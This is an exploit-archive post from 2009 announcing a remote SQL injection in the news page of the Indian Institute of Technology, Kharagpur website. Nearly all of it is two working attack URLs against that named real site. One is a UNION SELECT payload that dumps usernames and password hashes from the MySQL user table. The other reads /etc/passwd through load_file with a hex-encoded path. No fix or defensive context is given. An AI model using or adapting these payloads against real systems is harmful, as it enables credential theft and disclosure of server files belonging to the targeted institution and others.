indianinstitute-sql.txt

Posted on 04 January 2009

----------------------------------------------------------------------------------------------- [+] Indian Institute of Technology, Kharagpur suffers from a remote SQL injection vulnerability [+] Author: Rohit Bansal --------------------------------------------------------------------------------------- http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20convert(concat(user,0x3a,password)%20using%20latin1)%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+--<http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20convert%28concat%28user,0x3a,password%29%20using%20latin1%29%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+--> http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20load_file(0x2F6574632F706173737764)%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+--<http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20load_file%280x2F6574632F706173737764%29%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+--> --------------------------------------------------------------------------------------- [+]^Rohit Bansal [rohitisback@gmail.com] [+] Schap.org, Infysec ---------------------------------------------------------------------------------------

TOP

Malware :

Last 20

Exploits :

Last 20